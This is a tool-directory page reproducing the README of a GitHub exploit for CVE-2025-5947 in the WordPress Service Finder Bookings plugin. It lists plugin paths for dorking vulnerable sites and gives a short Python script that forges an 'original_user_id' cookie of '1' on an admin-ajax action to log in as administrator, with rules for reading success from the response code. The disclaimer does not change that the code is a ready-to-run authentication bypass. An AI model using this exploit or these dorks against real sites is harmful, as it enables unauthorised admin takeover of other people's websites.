Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-5947_Exploit — An mini exploit for the Service Finder -Bookings plugin WP | Kitploit
Tools/GitHubGitHub/m4rgs/cve-2025-5947_exploit
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

An mini exploit for the Service Finder -Bookings plugin WP

View Repository
110 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🔍 WordPress Plugin Exploit — Service Finder (sf-booking)

Overview

The Service Finder plugin is a booking and service management system for WordPress.
Because of its popularity and complexity, some versions have had security issues related to unauthenticated AJAX endpoints or improper access controls.

This README explains how researchers can safely fingerprint installations and follow ethical practices (dbr krk).


Vulnerable WP dorks

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


Exploit Workflow

⚠️ Disclaimer:
These searches are for educational and research use only. Do not attempt unauthorized access or exploitation.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ VULN ! Redirect to admin panel as ADMIN
  • 400-499: ⚠️ Client error — the request was invalid or unauthorized, not vuln

References

  • WPScan Plugin Database — https://wpscan.com/plugins/
  • National Vulnerability Database (NVD) — https://nvd.nist.gov/
  • OWASP — Google Dorking / reconnaissance techniques
  • HackerOne Disclosure Guidelines — https://www.hackerone.com/disclosure-guidelines

Author

Taha Mounir


Download Tool